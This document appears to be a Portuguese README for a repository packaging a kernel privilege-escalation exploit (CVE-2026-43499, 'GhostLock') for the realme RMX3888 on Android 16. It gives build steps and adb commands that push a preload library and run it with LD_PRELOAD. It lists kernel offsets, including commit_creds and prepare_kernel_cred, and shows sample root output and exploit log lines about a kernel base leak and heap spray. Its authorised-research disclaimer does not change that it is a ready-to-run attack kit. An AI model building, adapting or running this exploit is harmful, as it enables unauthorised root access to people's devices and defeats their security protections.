
CVE-2026-43499 configuração de exploit para realme RMX3888 (Android 16) - 20 offsets de kernel verificados
Este repositório contém os arquivos de configuração completos para o exploit CVE-2026-43499 (GhostLock) direcionado ao dispositivo realme RMX3888. Todos os offsets de kernel foram extraídos e verificados a partir do boot.img do dispositivo.
✓ 20 offsets de kernel verificados extraídos do vmlinux
✓ Logging em tempo real com O_SYNC + fsync para segurança contra kernel panic
✓ Configuração específica do dispositivo para RMX3888
✓ Script de compilação com um clique com detecção automática do NDK
✓ Documentação abrangente com guias de build
git clone https://github.com/Bailan766/rmx3888-cve-2026-43499-config.git
cd rmx3888-cve-2026-43499-config
export ANDROID_NDK_HOME=/path/to/android-ndk
chmod +x compile_rmx3888.sh
./compile_rmx3888.sh
No Git Bash do Windows, o script detecta automaticamente o caminho padrão do SDK usado pelo Android Studio e pelas ferramentas de linha de comando: /c/Android/Sdk/ndk/*.
Nota: ASHMEM_MISC_FOPS, ASHMEM_COMPAT_IOCTL e COPY_SPLICE_READ atualmente usam fallbacks compatíveis com build no cabeçalho do alvo RMX3888. Substitua-os por offsets vmlinux RMX3888 verificados antes de depender do comportamento em tempo de execução.
# Push to device
adb push build/rmx3888-BP2A.250605.015/bin/preload.so /data/local/tmp/
# Set permissions
adb shell chmod 755 /data/local/tmp/preload.so
# Execute exploit
adb shell LD_PRELOAD=/data/local/tmp/preload.so id
# Check logs
adb shell cat /sdcard/Download/log_*.txt
Os principais offsets abaixo foram extraídos do kernel 6.1.141. Consulte a nota acima para entradas de fallback compatíveis com build que ainda precisam de verificação específica do RMX3888.
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define INIT_TASK_OFF 0x0202fc00ULL
#define SECURITY_HOOK_HEADS_OFF 0x015c1488ULL
#define ASHMEM_FOPS_OFF 0x0126bbe0ULL
#define COMMIT_CREDS 0xffffffc0081e9b60 (offset: 0x001e9b60)
#define PREPARE_KERNEL_CRED 0xffffffc0081e9df0 (offset: 0x001e9df0)
// ... 15 more verified offsets
O módulo de logging em tempo real integrado fornece:
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),...
[18:00:01] [] Starting exploit... [18:00:02] [+] Kernel base leaked: 0xffffffc008000000 [18:00:03] [] Preparing heap spray... ... `
Consulte BUILD_GUIDE.md para instruções detalhadas de solução de problemas, incluindo:
⚠️ AVISO: Esta configuração é apenas para pesquisa de segurança autorizada.
Esta configuração é fornecida apenas para fins educacionais e de pesquisa em segurança.
Este repositório contém materiais de pesquisa em segurança. Os autores e contribuidores não são responsáveis por qualquer uso indevido ou dano causado por este código. Use por sua conta e risco e apenas em dispositivos que você possui ou para os quais tenha autorização explícita para testar.
Gerado: 2026-07-23
Versão do kernel: 6.1.141-android14-11-o-gffc54a6d2287
Verificação de offsets: 100% (20/20)
Status: Pronto para compilação